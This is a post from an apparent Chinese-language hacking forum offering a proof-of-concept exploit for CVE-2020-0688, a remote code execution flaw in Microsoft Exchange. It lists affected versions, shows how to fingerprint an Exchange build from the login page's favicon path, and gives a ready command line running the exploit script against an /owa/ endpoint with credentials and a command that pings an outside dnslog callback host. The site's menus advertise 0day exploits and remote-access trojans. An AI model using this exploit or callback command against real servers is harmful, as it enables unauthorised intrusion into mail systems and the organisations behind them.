[ 主页 ]  [ 隐私策略 ]  [ 0day ]  [ 业务合作 ]  [ 获得金币 ]  [ 项目开发 ]  [ 渗透 ]  [ 逆向破解 ]  [ faq ]  [ 联系我们 ]  [ 远控木马 ]  [ 合作方式 ]    用户: 39601     
0day Today Exploit DB Official RSS Channel
Tor
Telegram联系我们
Shacker

POC RCE-需要域用户(CVE-2020-0688)

Shacker

Shacker已验证会员

黑客倉庫站長

贡献: 21%
Python: 
## 漏洞概述

由于Exchange服务器在安装时没有正确地创建唯一的加密密钥所造成的

## 影响范围

```http
#需要域用户登陆
2010、2013、2016、2019
```

**对于如何识别版本可以用如下的方式**:

在登录界面查看网页源代码,15.1.225就是版本,之后在[Mircosoft网站](https://docs.microsoft.com/zh-cn/Exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019)上根据版本号就可以直接查询

```html
找到<link rel="shortcut icon" href="/owa/auth/15.1.225/themes/resources/favicon.ico" type="image/x-icon">
```

## EXP

```bash
python CVE-2020-0688.py -s https://ip/owa/ -u user -p pass -c "ping test.ph4nxq.dnslog.cn"
```

[@Ridter](https://github.com/Ridter/cve-2020-0688)
 
Shacker
POC  CVE-2020-0688
Shacker
POC  exchange-rce-exp
点击展开...
好评 0 否决票
您必须登录或注册才可回复。
相似主题 热门帖子 查看更多

暗网黑客论坛网站:声明,本网站的教程、文章、工具和其他相关内容仅供学习和研究使用,旨在提高公众的网络安全意识和防护能力。
我们强烈反对任何形式的非法活动,禁止未经授权的入侵、攻击、破坏他人的网络系统等行为。
Copyright © 2013-2025 HACK 您可以联系我们的Telegram进行业务合作: @Hack7er1949  网站地图Sitemap
后退
顶部